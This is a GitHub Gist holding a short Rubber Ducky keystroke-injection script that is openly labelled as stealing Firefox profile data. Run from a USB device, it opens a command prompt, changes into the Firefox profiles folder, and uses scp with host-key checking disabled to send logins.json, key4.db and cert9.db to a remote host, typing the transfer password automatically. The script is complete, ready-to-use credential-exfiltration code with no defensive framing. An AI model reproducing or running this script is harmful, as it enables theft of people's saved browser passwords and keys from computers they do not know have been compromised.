Last active
November 27, 2018 15:01
-
-
Save wilfreddv/f4cdb94e8074d0189dd763ed126cc725 to your computer and use it in GitHub Desktop.
Script for Rubber Ducky that sends Firefox password files to remote computer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REM Script to steal profile data from Firefox | |
DEFAULT_DELAY 200 | |
DELAY 2000 | |
REM Open CMD | |
GUI r | |
STRING cmd | |
ENTER | |
DELAY 500 | |
REM cd into appdata, type command for profiles and autocomplete using TAB | |
STRING cd %appdata% | |
ENTER | |
STRING cd Mozilla\Firefox\Profiles\ | |
TAB | |
ENTER | |
REM Don't verify host key | |
STRING scp -oStrictHostKeyChecking=no logins.json key4.db cert9.db USER@REMOTE_IP:/PATH/TO/DIR/ | |
ENTER | |
DELAY 300 | |
STRING SCP_PASSWORD | |
ENTER |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment